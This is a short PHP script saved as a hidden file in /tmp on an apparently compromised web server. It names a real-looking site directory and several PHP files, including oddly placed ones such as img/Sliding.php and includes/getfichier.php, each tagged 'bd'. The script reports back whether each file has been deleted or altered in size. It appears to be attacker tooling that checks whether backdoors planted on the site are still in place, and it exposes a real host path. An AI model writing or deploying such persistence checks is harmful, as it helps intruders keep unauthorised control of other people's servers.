File: //tmp/.pgrp
<?php $r = '/home/vitanhod/trimate1.vitavit.com.pk'; $x = ["/orderemail.php"=>"bd@@1310080@@55",
"/includes/config.php"=>"bd@@1310475@@100",
"/includes/configOnline.php"=>"bd@@1310185@@21",
"/MemcachedStore.php"=>"bd@@1312772@@85",
"/includes/getfichier.php"=>"bd@@1313040@@82",
"/img/Sliding.php"=>"bd@@1310607@@1009",
"/MemcachedStore.php"=>"bd@@1310559@@1025",
"/includes/getfichier.php"=>"bd@@1309796@@946",
"/img/Sliding.php"=>"bd@@1312890@@51",
"/orderemail_bk.php"=>"bd@@1310368@@33"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');